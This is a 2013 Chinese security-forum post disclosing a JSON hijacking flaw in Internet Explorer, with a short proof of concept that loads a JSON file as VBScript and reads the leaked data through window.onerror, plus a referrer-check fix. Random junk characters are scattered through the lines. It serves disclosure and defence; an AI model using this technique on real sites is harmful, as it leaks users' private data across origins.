找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2076|回复: 0
打印 上一主题 下一主题

IE通用JSON劫持漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 11:33:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:, {# {4 P$ M4 \. j9 d) |
4 C( h' {; w- `. H; O
由于某些资源容器对数据处理不当导致json劫持漏洞.
6 W1 S3 M$ c& Y* h3 e, Z+ u* h详细说明:
5 L7 g7 [, g, q0 o! N, r. c由于ie支持vbscript,所以script元素可以指定成vbscript语言:" ^5 k- F  \8 [8 Y7 q7 x
<script language=vbscript></script>
$ _4 q" c7 g; |$ T- r- W 8 w1 V; G/ l& g$ Y; i7 m$ c
当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.
5 }8 P: Q- d; p4 O7 l, G漏洞证明:* B" c" y, v0 q8 b2 \9 V, F
<script>( C0 J; L" [/ m0 u
window.onerror=function(_){6 ~+ C0 P/ c; n6 }) b( Z5 t
alert(_)7 W, J0 S5 I* F6 t( ^  q
}
4 K4 m' g3 f- A. {</script>
$ I# d+ f% I4 j5 w6 B2 n! |% K0 L<script language=vbscript src=1.json></script>
3 Y3 j$ v4 a5 t& j2 _3 \0 s, q0 ] " q3 O) ]+ V% [1 ]( d, _
2 a  K) Y; ^  o$ k2 C
1.json:7 v4 c/ c0 I4 l& ^; W5 o
[{"name":"sogili","age":19}]9 t7 T( L2 ~* B5 r6 J
修复方案:
3 n% D( G$ U- P# E. \网站业务对于这个问题可以通过验证referrer是否为同源来防御
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表